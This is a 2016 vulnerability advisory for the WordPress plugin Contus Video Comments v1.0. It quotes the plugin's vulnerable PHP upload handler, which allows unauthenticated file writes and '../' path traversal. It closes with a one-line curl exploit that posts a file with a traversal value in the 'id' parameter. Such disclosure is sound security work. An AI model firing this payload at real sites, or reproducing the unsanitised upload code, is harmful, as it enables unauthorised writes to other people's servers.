WordPress Contus Video Comments plugin version 1.0 suffers from a remote file upload vulnerability.
4f6ec1ff49f824524c93da0857f1b6f61521cb94809158b755faa6e7a4516efa
Title: Unauthenticated remote .jpg file upload in contus-video-comments v1.0 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2016-06-15
Download Site: https://wordpress.org/plugins/contus-video-comments/
Vendor: https://profiles.wordpress.org/hdflvplayer/
Vendor Notified: 2016-06-16
Vendor Contact:
Description: Video comments integrated with the standard comment system of wordpress.
Vulnerability:
The following code allows any user to upload .jpg files to the WordPress installation. It also allows path traversal with ../.
<?php
//This project is done by vamapaull: http://blog.vamapaull.com/
//The php code is done with some help from Mihai Bojin: http://www.mihaibojin.com/
if(isset($GLOBALS["HTTP_RAW_POST_DATA"])){
$jpg = $GLOBALS["HTTP_RAW_POST_DATA"];
$filename = "images/". $_GET["id"]. ".jpg";
file_put_contents($filename, $jpg);
} else{
echo "Encoded JPEG information not received.";
}
?>
CVE-TBD
Exploit Code:
• $ curl --data @image.jpg "http://wp-site/wp-content/plugins/contus-video-comments/save.php?id=../image"